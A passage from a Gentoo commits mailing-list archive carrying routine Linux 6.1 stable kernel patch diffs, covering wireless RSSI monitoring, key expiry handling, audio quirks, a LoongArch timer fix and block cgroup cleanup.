++0x06, 0xc6, 0x46, 0xbf, 0x4b, 0x6d, 0xa6, 0xd5,
++0xab, 0xcc, 0x60, 0xfc, 0xe5, 0x37, 0xb6, 0x53,
++0x7d, 0x58, 0x95, 0xa9, 0x56, 0xc7, 0xf7, 0xee,
++0xc3, 0xa0, 0x76, 0xf7, 0x65, 0x4d, 0x53, 0xfa,
++0xff, 0x5f, 0x76, 0x33, 0x5a, 0x08, 0xfa, 0x86,
++0x92, 0x5a, 0x13, 0xfa, 0x1a, 0xfc, 0xf2, 0x1b,
++0x8c, 0x7f, 0x42, 0x6d, 0xb7, 0x7e, 0xb7, 0xb4,
++0xf0, 0xc7, 0x83, 0xbb, 0xa2, 0x81, 0x03, 0x2d,
++0xd4, 0x2a, 0x63, 0x3f, 0xf7, 0x31, 0x2e, 0x40,
++0x33, 0x5c, 0x46, 0xbc, 0x9b, 0xc1, 0x05, 0xa5,
++0x45, 0x4e, 0xc3,
+diff --git a/net/wireless/core.h b/net/wireless/core.h
+index e1accacc6f233..ee980965a7cfb 100644
+--- a/net/wireless/core.h
++++ b/net/wireless/core.h
+@@ -297,6 +297,7 @@ struct cfg80211_cqm_config {
+ 	u32 rssi_hyst;
+ 	s32 last_rssi_event_value;
+ 	enum nl80211_cqm_rssi_threshold_event last_rssi_event_type;
++	bool use_range_api;
+ 	int n_rssi_thresholds;
+ 	s32 rssi_thresholds[];
+ };
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index b19b5acfaf3a9..70fb14b8bab07 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -12574,10 +12574,6 @@ static int cfg80211_cqm_rssi_update(struct cfg80211_registered_device *rdev,
+ 	int i, n, low_index;
+ 	int err;
+ 
+-	/* RSSI reporting disabled? */
+-	if (!cqm_config)
+-		return rdev_set_cqm_rssi_range_config(rdev, dev, 0, 0);
+-
+ 	/*
+ 	 * Obtain current RSSI value if possible, if not and no RSSI threshold
+ 	 * event has been received yet, we should receive an event after a
+@@ -12652,18 +12648,6 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 	    wdev->iftype != NL80211_IFTYPE_P2P_CLIENT)
+ 		return -EOPNOTSUPP;
+ 
+-	if (n_thresholds <= 1 && rdev->ops->set_cqm_rssi_config) {
+-		if (n_thresholds == 0 || thresholds[0] == 0) /* Disabling */
+-			return rdev_set_cqm_rssi_config(rdev, dev, 0, 0);
+-
+-		return rdev_set_cqm_rssi_config(rdev, dev,
+-						thresholds[0], hysteresis);
+-	}
+-
+-	if (!wiphy_ext_feature_isset(&rdev->wiphy,
+-				     NL80211_EXT_FEATURE_CQM_RSSI_LIST))
+-		return -EOPNOTSUPP;
+-
+ 	if (n_thresholds == 1 && thresholds[0] == 0) /* Disabling */
+ 		n_thresholds = 0;
+ 
+@@ -12671,6 +12655,26 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 	old = rcu_dereference_protected(wdev->cqm_config,
+ 					lockdep_is_held(&wdev->mtx));
+ 
++	/* if already disabled just succeed */
++	if (!n_thresholds && !old) {
++		err = 0;
++		goto unlock;
++	}
++
++	if (n_thresholds > 1) {
++		if (!wiphy_ext_feature_isset(&rdev->wiphy,
++					     NL80211_EXT_FEATURE_CQM_RSSI_LIST) ||
++		    !rdev->ops->set_cqm_rssi_range_config) {
++			err = -EOPNOTSUPP;
++			goto unlock;
++		}
++	} else {
++		if (!rdev->ops->set_cqm_rssi_config) {
++			err = -EOPNOTSUPP;
++			goto unlock;
++		}
++	}
++
+ 	if (n_thresholds) {
+ 		cqm_config = kzalloc(struct_size(cqm_config, rssi_thresholds,
+ 						 n_thresholds),
+@@ -12685,13 +12689,26 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 		memcpy(cqm_config->rssi_thresholds, thresholds,
+ 		       flex_array_size(cqm_config, rssi_thresholds,
+ 				       n_thresholds));
++		cqm_config->use_range_api = n_thresholds > 1 ||
++					    !rdev->ops->set_cqm_rssi_config;
+ 
+ 		rcu_assign_pointer(wdev->cqm_config, cqm_config);
++
++		if (cqm_config->use_range_api)
++			err = cfg80211_cqm_rssi_update(rdev, dev, cqm_config);
++		else
++			err = rdev_set_cqm_rssi_config(rdev, dev,
++						       thresholds[0],
++						       hysteresis);
+ 	} else {
+ 		RCU_INIT_POINTER(wdev->cqm_config, NULL);
++		/* if enabled as range also disable via range */
++		if (old->use_range_api)
++			err = rdev_set_cqm_rssi_range_config(rdev, dev, 0, 0);
++		else
++			err = rdev_set_cqm_rssi_config(rdev, dev, 0, 0);
+ 	}
+ 
+-	err = cfg80211_cqm_rssi_update(rdev, dev, cqm_config);
+ 	if (err) {
+ 		rcu_assign_pointer(wdev->cqm_config, old);
+ 		kfree_rcu(cqm_config, rcu_head);
+@@ -18758,10 +18775,11 @@ void cfg80211_cqm_rssi_notify_work(struct wiphy *wiphy, struct wiphy_work *work)
+ 	wdev_lock(wdev);
+ 	cqm_config = rcu_dereference_protected(wdev->cqm_config,
+ 					       lockdep_is_held(&wdev->mtx));
+-	if (!wdev->cqm_config)
++	if (!cqm_config)
+ 		goto unlock;
+ 
+-	cfg80211_cqm_rssi_update(rdev, wdev->netdev, cqm_config);
++	if (cqm_config->use_range_api)
++		cfg80211_cqm_rssi_update(rdev, wdev->netdev, cqm_config);
+ 
+ 	rssi_level = cqm_config->last_rssi_event_value;
+ 	rssi_event = cqm_config->last_rssi_event_type;
+diff --git a/security/keys/gc.c b/security/keys/gc.c
+index 3c90807476eb0..eaddaceda14ea 100644
+--- a/security/keys/gc.c
++++ b/security/keys/gc.c
+@@ -66,6 +66,19 @@ void key_schedule_gc(time64_t gc_at)
+ 	}
+ }
+ 
++/*
++ * Set the expiration time on a key.
++ */
++void key_set_expiry(struct key *key, time64_t expiry)
++{
++	key->expiry = expiry;
++	if (expiry != TIME64_MAX) {
++		if (!(key->type->flags & KEY_TYPE_INSTANT_REAP))
++			expiry += key_gc_delay;
++		key_schedule_gc(expiry);
++	}
++}
++
+ /*
+  * Schedule a dead links collection run.
+  */
+@@ -176,7 +189,6 @@ static void key_garbage_collector(struct work_struct *work)
+ 	static u8 gc_state;		/* Internal persistent state */
+ #define KEY_GC_REAP_AGAIN	0x01	/* - Need another cycle */
+ #define KEY_GC_REAPING_LINKS	0x02	/* - We need to reap links */
+-#define KEY_GC_SET_TIMER	0x04	/* - We need to restart the timer */
+ #define KEY_GC_REAPING_DEAD_1	0x10	/* - We need to mark dead keys */
+ #define KEY_GC_REAPING_DEAD_2	0x20	/* - We need to reap dead key links */
+ #define KEY_GC_REAPING_DEAD_3	0x40	/* - We need to reap dead keys */
+@@ -184,21 +196,17 @@ static void key_garbage_collector(struct work_struct *work)
+ 
+ 	struct rb_node *cursor;
+ 	struct key *key;
+-	time64_t new_timer, limit;
++	time64_t new_timer, limit, expiry;
+ 
+ 	kenter("[%lx,%x]", key_gc_flags, gc_state);
+ 
+ 	limit = ktime_get_real_seconds();
+-	if (limit > key_gc_delay)
+-		limit -= key_gc_delay;
+-	else
+-		limit = key_gc_delay;
+ 
+ 	/* Work out what we're going to be doing in this pass */
+ 	gc_state &= KEY_GC_REAPING_DEAD_1 | KEY_GC_REAPING_DEAD_2;
+ 	gc_state <<= 1;
+ 	if (test_and_clear_bit(KEY_GC_KEY_EXPIRED, &key_gc_flags))
+-		gc_state |= KEY_GC_REAPING_LINKS | KEY_GC_SET_TIMER;
++		gc_state |= KEY_GC_REAPING_LINKS;
+ 
+ 	if (test_and_clear_bit(KEY_GC_REAP_KEYTYPE, &key_gc_flags))
+ 		gc_state |= KEY_GC_REAPING_DEAD_1;
+@@ -233,8 +241,11 @@ continue_scanning:
+ 			}
+ 		}
+ 
+-		if (gc_state & KEY_GC_SET_TIMER) {
+-			if (key->expiry > limit && key->expiry < new_timer) {
++		expiry = key->expiry;
++		if (expiry != TIME64_MAX) {
++			if (!(key->type->flags & KEY_TYPE_INSTANT_REAP))
++				expiry += key_gc_delay;
++			if (expiry > limit && expiry < new_timer) {
+ 				kdebug("will expire %x in %lld",
+ 				       key_serial(key), key->expiry - limit);
+ 				new_timer = key->expiry;
+@@ -276,7 +287,7 @@ maybe_resched:
+ 	 */
+ 	kdebug("pass complete");
+ 
+-	if (gc_state & KEY_GC_SET_TIMER && new_timer != (time64_t)TIME64_MAX) {
++	if (new_timer != TIME64_MAX) {
+ 		new_timer += key_gc_delay;
+ 		key_schedule_gc(new_timer);
+ 	}
+diff --git a/security/keys/internal.h b/security/keys/internal.h
+index 3c1e7122076b9..ec2ec335b6133 100644
+--- a/security/keys/internal.h
++++ b/security/keys/internal.h
+@@ -174,6 +174,7 @@ extern unsigned key_gc_delay;
+ extern void keyring_gc(struct key *keyring, time64_t limit);
+ extern void keyring_restriction_gc(struct key *keyring,
+ 				   struct key_type *dead_type);
++void key_set_expiry(struct key *key, time64_t expiry);
+ extern void key_schedule_gc(time64_t gc_at);
+ extern void key_schedule_gc_links(void);
+ extern void key_gc_keytype(struct key_type *ktype);
+@@ -222,10 +223,18 @@ extern struct key *key_get_instantiation_authkey(key_serial_t target_id);
+  */
+ static inline bool key_is_dead(const struct key *key, time64_t limit)
+ {
++	time64_t expiry = key->expiry;
++
++	if (expiry != TIME64_MAX) {
++		if (!(key->type->flags & KEY_TYPE_INSTANT_REAP))
++			expiry += key_gc_delay;
++		if (expiry <= limit)
++			return true;
++	}
++
+ 	return
+ 		key->flags & ((1 << KEY_FLAG_DEAD) |
+ 			      (1 << KEY_FLAG_INVALIDATED)) ||
+-		(key->expiry > 0 && key->expiry <= limit) ||
+ 		key->domain_tag->removed;
+ }
+ 
+diff --git a/security/keys/key.c b/security/keys/key.c
+index c45afdd1dfbb4..e65240641ca57 100644
+--- a/security/keys/key.c
++++ b/security/keys/key.c
+@@ -294,6 +294,7 @@ struct key *key_alloc(struct key_type *type, const char *desc,
+ 	key->uid = uid;
+ 	key->gid = gid;
+ 	key->perm = perm;
++	key->expiry = TIME64_MAX;
+ 	key->restrict_link = restrict_link;
+ 	key->last_used_at = ktime_get_real_seconds();
+ 
+@@ -463,10 +464,7 @@ static int __key_instantiate_and_link(struct key *key,
+ 			if (authkey)
+ 				key_invalidate(authkey);
+ 
+-			if (prep->expiry != TIME64_MAX) {
+-				key->expiry = prep->expiry;
+-				key_schedule_gc(prep->expiry + key_gc_delay);
+-			}
++			key_set_expiry(key, prep->expiry);
+ 		}
+ 	}
+ 
+@@ -606,8 +604,7 @@ int key_reject_and_link(struct key *key,
+ 		atomic_inc(&key->user->nikeys);
+ 		mark_key_instantiated(key, -error);
+ 		notify_key(key, NOTIFY_KEY_INSTANTIATED, -error);
+-		key->expiry = ktime_get_real_seconds() + timeout;
+-		key_schedule_gc(key->expiry + key_gc_delay);
++		key_set_expiry(key, ktime_get_real_seconds() + timeout);
+ 
+ 		if (test_and_clear_bit(KEY_FLAG_USER_CONSTRUCT, &key->flags))
+ 			awaken = 1;
+@@ -722,16 +719,14 @@ found_kernel_type:
+ 
+ void key_set_timeout(struct key *key, unsigned timeout)
+ {
+-	time64_t expiry = 0;
++	time64_t expiry = TIME64_MAX;
+ 
+ 	/* make the changes with the locks held to prevent races */
+ 	down_write(&key->sem);
+ 
+ 	if (timeout > 0)
+ 		expiry = ktime_get_real_seconds() + timeout;
+-
+-	key->expiry = expiry;
+-	key_schedule_gc(key->expiry + key_gc_delay);
++	key_set_expiry(key, expiry);
+ 
+ 	up_write(&key->sem);
+ }
+diff --git a/security/keys/proc.c b/security/keys/proc.c
+index d0cde6685627f..4f4e2c1824f18 100644
+--- a/security/keys/proc.c
++++ b/security/keys/proc.c
+@@ -198,7 +198,7 @@ static int proc_keys_show(struct seq_file *m, void *v)
+ 
+ 	/* come up with a suitable timeout value */
+ 	expiry = READ_ONCE(key->expiry);
+-	if (expiry == 0) {
++	if (expiry == TIME64_MAX) {
+ 		memcpy(xbuf, "perm", 5);
+ 	} else if (now >= expiry) {
+ 		memcpy(xbuf, "expd", 5);
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index a7c361e0daebe..a88ed60dcd96a 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9735,6 +9735,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1473, "ASUS GU604V", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1483, "ASUS GU603V", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1517, "Asus Zenbook UX31A", ALC269VB_FIXUP_ASUS_ZENBOOK_UX31A),
++	SND_PCI_QUIRK(0x1043, 0x1533, "ASUS GV302XA", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1573, "ASUS GZ301V", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1662, "ASUS GV301QH", ALC294_FIXUP_ASUS_DUAL_SPK),
+ 	SND_PCI_QUIRK(0x1043, 0x1663, "ASUS GU603ZV", ALC285_FIXUP_ASUS_HEADSET_MIC),
+diff --git a/sound/soc/codecs/hdmi-codec.c b/sound/soc/codecs/hdmi-codec.c
+index 4d3c3365488a2..d8259afc60b08 100644
+--- a/sound/soc/codecs/hdmi-codec.c
++++ b/sound/soc/codecs/hdmi-codec.c
+@@ -834,8 +834,9 @@ static int hdmi_dai_probe(struct snd_soc_dai *dai)
+ static void hdmi_codec_jack_report(struct hdmi_codec_priv *hcp,
+ 				   unsigned int jack_status)
+ {
+-	if (hcp->jack && jack_status != hcp->jack_status) {
+-		snd_soc_jack_report(hcp->jack, jack_status, SND_JACK_LINEOUT);
++	if (jack_status != hcp->jack_status) {
++		if (hcp->jack)
++			snd_soc_jack_report(hcp->jack, jack_status, SND_JACK_LINEOUT);
+ 		hcp->jack_status = jack_status;
+ 	}
+ }
+@@ -864,6 +865,13 @@ static int hdmi_codec_set_jack(struct snd_soc_component *component,
+ 
+ 	if (hcp->hcd.ops->hook_plugged_cb) {
+ 		hcp->jack = jack;
++
++		/*
++		 * Report the initial jack status which may have been provided
++		 * by the parent hdmi driver while the hpd hook was registered.
++		 */
++		snd_soc_jack_report(jack, hcp->jack_status, SND_JACK_LINEOUT);
++
+ 		return 0;
+ 	}
+ 
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index 6364d9be28fbb..cf1cd0460ad98 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -715,6 +715,9 @@ static int fsl_sai_hw_free(struct snd_pcm_substream *substream,
+ 	bool tx = substream->stream == SNDRV_PCM_STREAM_PLAYBACK;
+ 	unsigned int ofs = sai->soc_data->reg_offset;
+ 
++	/* Clear xMR to avoid channel swap with mclk_with_tere enabled case */
++	regmap_write(sai->regmap, FSL_SAI_xMR(tx), 0);
++
+ 	regmap_update_bits(sai->regmap, FSL_SAI_xCR3(tx, ofs),
+ 			   FSL_SAI_CR3_TRCE_MASK, 0);
+ 
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index f458328f9ec42..33380cad3a735 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -1385,7 +1385,7 @@ free_buf:
+ 
+ static int snd_usb_motu_m_series_boot_quirk(struct usb_device *dev)
+ {
+-	msleep(2000);
++	msleep(4000);
+ 
+ 	return 0;
+ }
+@@ -1628,7 +1628,7 @@ int snd_usb_apply_boot_quirk_once(struct usb_device *dev,
+ 				  unsigned int id)
+ {
+ 	switch (id) {
+-	case USB_ID(0x07fd, 0x0008): /* MOTU M Series */
++	case USB_ID(0x07fd, 0x0008): /* MOTU M Series, 1st hardware version */
+ 		return snd_usb_motu_m_series_boot_quirk(dev);
+ 	}
+ 
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index ea6fc59e9f62f..e52d513009fb0 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -2652,7 +2652,7 @@ backup_tests()
+ 	fi
+ 
+ 	if reset "mpc backup" &&
+-	   continue_if mptcp_lib_kallsyms_doesnt_have "mptcp_subflow_send_ack$"; then
++	   continue_if mptcp_lib_kallsyms_doesnt_have "T mptcp_subflow_send_ack$"; then
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,backup
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+ 		chk_join_nr 0 0 0
+@@ -2660,7 +2660,7 @@ backup_tests()
+ 	fi
+ 
+ 	if reset "mpc backup both sides" &&
+-	   continue_if mptcp_lib_kallsyms_doesnt_have "mptcp_subflow_send_ack$"; then
++	   continue_if mptcp_lib_kallsyms_doesnt_have "T mptcp_subflow_send_ack$"; then
+ 		pm_nl_add_endpoint $ns1 10.0.1.1 flags subflow,backup
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,backup
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+@@ -2669,7 +2669,7 @@ backup_tests()
+ 	fi
+ 
+ 	if reset "mpc switch to backup" &&
+-	   continue_if mptcp_lib_kallsyms_doesnt_have "mptcp_subflow_send_ack$"; then
++	   continue_if mptcp_lib_kallsyms_doesnt_have "T mptcp_subflow_send_ack$"; then
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup
+ 		chk_join_nr 0 0 0
+@@ -2677,7 +2677,7 @@ backup_tests()
+ 	fi
+ 
+ 	if reset "mpc switch to backup both sides" &&
+-	   continue_if mptcp_lib_kallsyms_doesnt_have "mptcp_subflow_send_ack$"; then
++	   continue_if mptcp_lib_kallsyms_doesnt_have "T mptcp_subflow_send_ack$"; then
+ 		pm_nl_add_endpoint $ns1 10.0.1.1 flags subflow
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-12-20 16:56 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-12-20 16:56 UTC (permalink / raw
  To: gentoo-commits

commit:     df521057576f25c519318776dee39439f5d07dc0
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Dec 20 16:55:58 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Dec 20 16:55:58 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=df521057

Linux patch 6.1.69

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1068_linux-6.1.69.patch | 4110 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4114 insertions(+)

diff --git a/0000_README b/0000_README
index a8206ed1..3d9aed2d 100644
--- a/0000_README
+++ b/0000_README
@@ -315,6 +315,10 @@ Patch:  1067_linux-6.1.68.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.68
 
+Patch:  1068_linux-6.1.69.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.69
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1068_linux-6.1.69.patch b/1068_linux-6.1.69.patch
new file mode 100644
index 00000000..fd8d28e1
--- /dev/null
+++ b/1068_linux-6.1.69.patch
@@ -0,0 +1,4110 @@
+diff --git a/Makefile b/Makefile
+index 2a8ad0cec2f1c..9a3b34d2387fa 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 68
++SUBLEVEL = 69
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/Makefile b/arch/arm64/Makefile
+index 5e56d26a22398..c9496539c3351 100644
+--- a/arch/arm64/Makefile
++++ b/arch/arm64/Makefile
+@@ -157,7 +157,7 @@ endif
+ 
+ all:	$(notdir $(KBUILD_IMAGE))
+ 
+-
++vmlinuz.efi: Image
+ Image vmlinuz.efi: vmlinux
+ 	$(Q)$(MAKE) $(build)=$(boot) $(boot)/$@
+ 
+diff --git a/arch/arm64/include/asm/pgtable.h b/arch/arm64/include/asm/pgtable.h
+index 5d0f1f7b76004..56c7df4c65325 100644
+--- a/arch/arm64/include/asm/pgtable.h
++++ b/arch/arm64/include/asm/pgtable.h
+@@ -822,6 +822,12 @@ static inline pte_t pte_modify(pte_t pte, pgprot_t newprot)
+ 	if (pte_hw_dirty(pte))
+ 		pte = pte_mkdirty(pte);
+ 	pte_val(pte) = (pte_val(pte) & ~mask) | (pgprot_val(newprot) & mask);
++	/*
++	 * If we end up clearing hw dirtiness for a sw-dirty PTE, set hardware
++	 * dirtiness again.
++	 */
++	if (pte_sw_dirty(pte))
++		pte = pte_mkdirty(pte);
+ 	return pte;
+ }
+ 
+diff --git a/arch/loongarch/Makefile b/arch/loongarch/Makefile
+index 01b57b7263225..ed47a3a87768e 100644
+--- a/arch/loongarch/Makefile
++++ b/arch/loongarch/Makefile
+@@ -116,6 +116,8 @@ vdso_install:
+ 
+ all:	$(notdir $(KBUILD_IMAGE))
+ 
++vmlinuz.efi: vmlinux.efi
++
+ vmlinux.elf vmlinux.efi vmlinuz.efi: vmlinux
+ 	$(Q)$(MAKE) $(build)=$(boot) $(bootvars-y) $(boot)/$@
+ 
+diff --git a/arch/loongarch/kernel/time.c b/arch/loongarch/kernel/time.c
+index d2b7d5df132a9..150df6e17bb6a 100644
+--- a/arch/loongarch/kernel/time.c
++++ b/arch/loongarch/kernel/time.c
+@@ -58,14 +58,16 @@ static int constant_set_state_oneshot(struct clock_event_device *evt)
+ 	return 0;
+ }
+ 
+-static int constant_set_state_oneshot_stopped(struct clock_event_device *evt)
++static int constant_set_state_periodic(struct clock_event_device *evt)
+ {
++	unsigned long period;
+ 	unsigned long timer_config;
+ 
+ 	raw_spin_lock(&state_lock);
+ 
+-	timer_config = csr_read64(LOONGARCH_CSR_TCFG);
+-	timer_config &= ~CSR_TCFG_EN;
++	period = const_clock_freq / HZ;
++	timer_config = period & CSR_TCFG_VAL;
++	timer_config |= (CSR_TCFG_PERIOD | CSR_TCFG_EN);
+ 	csr_write64(timer_config, LOONGARCH_CSR_TCFG);
+ 
+ 	raw_spin_unlock(&state_lock);
+@@ -73,16 +75,14 @@ static int constant_set_state_oneshot_stopped(struct clock_event_device *evt)
+ 	return 0;
+ }
+ 
+-static int constant_set_state_periodic(struct clock_event_device *evt)
++static int constant_set_state_shutdown(struct clock_event_device *evt)
+ {
+-	unsigned long period;
+ 	unsigned long timer_config;
+ 
+ 	raw_spin_lock(&state_lock);
+ 
+-	period = const_clock_freq / HZ;
+-	timer_config = period & CSR_TCFG_VAL;
+-	timer_config |= (CSR_TCFG_PERIOD | CSR_TCFG_EN);
++	timer_config = csr_read64(LOONGARCH_CSR_TCFG);
++	timer_config &= ~CSR_TCFG_EN;
+ 	csr_write64(timer_config, LOONGARCH_CSR_TCFG);
+ 
+ 	raw_spin_unlock(&state_lock);
+@@ -90,11 +90,6 @@ static int constant_set_state_periodic(struct clock_event_device *evt)
+ 	return 0;
+ }
+ 
+-static int constant_set_state_shutdown(struct clock_event_device *evt)
+-{
+-	return 0;
+-}
+-
+ static int constant_timer_next_event(unsigned long delta, struct clock_event_device *evt)
+ {
+ 	unsigned long timer_config;
+@@ -156,7 +151,7 @@ int constant_clockevent_init(void)
+ 	cd->rating = 320;
+ 	cd->cpumask = cpumask_of(cpu);
+ 	cd->set_state_oneshot = constant_set_state_oneshot;
+-	cd->set_state_oneshot_stopped = constant_set_state_oneshot_stopped;
++	cd->set_state_oneshot_stopped = constant_set_state_shutdown;
+ 	cd->set_state_periodic = constant_set_state_periodic;
+ 	cd->set_state_shutdown = constant_set_state_shutdown;
+ 	cd->set_next_event = constant_timer_next_event;
+diff --git a/arch/powerpc/kernel/trace/ftrace_mprofile.S b/arch/powerpc/kernel/trace/ftrace_mprofile.S
+index 6f9c2dea905b7..f4a72b38488f7 100644
+--- a/arch/powerpc/kernel/trace/ftrace_mprofile.S
++++ b/arch/powerpc/kernel/trace/ftrace_mprofile.S
+@@ -62,7 +62,7 @@
+ 	.endif
+ 
+ 	/* Save previous stack pointer (r1) */
+-	addi	r8, r1, SWITCH_FRAME_SIZE
++	addi	r8, r1, SWITCH_FRAME_SIZE+STACK_FRAME_MIN_SIZE
+ 	PPC_STL	r8, GPR1(r1)
+ 
+ 	.if \allregs == 1
+@@ -182,7 +182,7 @@ ftrace_no_trace:
+ 	mflr	r3
+ 	mtctr	r3
+ 	REST_GPR(3, r1)
+-	addi	r1, r1, SWITCH_FRAME_SIZE
++	addi	r1, r1, SWITCH_FRAME_SIZE+STACK_FRAME_MIN_SIZE
+ 	mtlr	r0
+ 	bctr
+ #endif
+diff --git a/arch/x86/events/intel/uncore_discovery.c b/arch/x86/events/intel/uncore_discovery.c
+index 5fd72d4b8bbb0..7d454141433c8 100644
+--- a/arch/x86/events/intel/uncore_discovery.c
++++ b/arch/x86/events/intel/uncore_discovery.c
+@@ -140,13 +140,21 @@ uncore_insert_box_info(struct uncore_unit_discovery *unit,
+ 	unsigned int *box_offset, *ids;
+ 	int i;
+ 
+-	if (WARN_ON_ONCE(!unit->ctl || !unit->ctl_offset || !unit->ctr_offset))
++	if (!unit->ctl || !unit->ctl_offset || !unit->ctr_offset) {
++		pr_info("Invalid address is detected for uncore type %d box %d, "
++			"Disable the uncore unit.\n",
++			unit->box_type, unit->box_id);
+ 		return;
++	}
+ 
+ 	if (parsed) {
+ 		type = search_uncore_discovery_type(unit->box_type);
+-		if (WARN_ON_ONCE(!type))
++		if (!type) {
++			pr_info("A spurious uncore type %d is detected, "
++				"Disable the uncore type.\n",
++				unit->box_type);
+ 			return;
++		}
+ 		/* Store the first box of each die */
+ 		if (!type->box_ctrl_die[die])
+ 			type->box_ctrl_die[die] = unit->ctl;
+@@ -181,8 +189,12 @@ uncore_insert_box_info(struct uncore_unit_discovery *unit,
+ 		ids[i] = type->ids[i];
+ 		box_offset[i] = type->box_offset[i];
+ 
+-		if (WARN_ON_ONCE(unit->box_id == ids[i]))
++		if (unit->box_id == ids[i]) {
++			pr_info("Duplicate uncore type %d box ID %d is detected, "
++				"Drop the duplicate uncore unit.\n",
++				unit->box_type, unit->box_id);
+ 			goto free_ids;
++		}
+ 	}
+ 	ids[i] = unit->box_id;
+ 	box_offset[i] = unit->ctl - type->box_ctrl;
+diff --git a/arch/x86/hyperv/hv_init.c b/arch/x86/hyperv/hv_init.c
+index 189ae92de4d06..c18e5c764643b 100644
+--- a/arch/x86/hyperv/hv_init.c
++++ b/arch/x86/hyperv/hv_init.c
+@@ -13,6 +13,7 @@
+ #include <linux/io.h>
+ #include <asm/apic.h>
+ #include <asm/desc.h>
++#include <asm/e820/api.h>
+ #include <asm/sev.h>
+ #include <asm/ibt.h>
+ #include <asm/hypervisor.h>
+@@ -267,15 +268,31 @@ static int hv_cpu_die(unsigned int cpu)
+ 
+ static int __init hv_pci_init(void)
+ {
+-	int gen2vm = efi_enabled(EFI_BOOT);
++	bool gen2vm = efi_enabled(EFI_BOOT);
+ 
+ 	/*
+-	 * For Generation-2 VM, we exit from pci_arch_init() by returning 0.
+-	 * The purpose is to suppress the harmless warning:
++	 * A Generation-2 VM doesn't support legacy PCI/PCIe, so both
++	 * raw_pci_ops and raw_pci_ext_ops are NULL, and pci_subsys_init() ->
++	 * pcibios_init() doesn't call pcibios_resource_survey() ->
++	 * e820__reserve_resources_late(); as a result, any emulated persistent
++	 * memory of E820_TYPE_PRAM (12) via the kernel parameter
++	 * memmap=nn[KMG]!ss is not added into iomem_resource and hence can't be
++	 * detected by register_e820_pmem(). Fix this by directly calling
++	 * e820__reserve_resources_late() here: e820__reserve_resources_late()
++	 * depends on e820__reserve_resources(), which has been called earlier
++	 * from setup_arch(). Note: e820__reserve_resources_late() also adds
++	 * any memory of E820_TYPE_PMEM (7) into iomem_resource, and
++	 * acpi_nfit_register_region() -> acpi_nfit_insert_resource() ->
++	 * region_intersects() returns REGION_INTERSECTS, so the memory of
++	 * E820_TYPE_PMEM won't get added twice.
++	 *
++	 * We return 0 here so that pci_arch_init() won't print the warning:
+ 	 * "PCI: Fatal: No config space access function found"
+ 	 */
+-	if (gen2vm)
++	if (gen2vm) {
++		e820__reserve_resources_late();
+ 		return 0;
++	}
+ 
+ 	/* For Generation-1 VM, we'll proceed in pci_arch_init().  */
+ 	return 1;
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index 60f366f98fa2b..1b7fd1fc2f337 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -462,6 +462,7 @@ static void blkg_destroy_all(struct gendisk *disk)
+ 	struct request_queue *q = disk->queue;
+ 	struct blkcg_gq *blkg, *n;
+ 	int count = BLKG_DESTROY_BATCH_SIZE;
++	int i;
+ 
+ restart:
+ 	spin_lock_irq(&q->queue_lock);
+@@ -487,6 +488,18 @@ restart:
+ 		}
+ 	}
+ 
++	/*
++	 * Mark policy deactivated since policy offline has been done, and
++	 * the free is scheduled, so future blkcg_deactivate_policy() can
++	 * be bypassed
++	 */
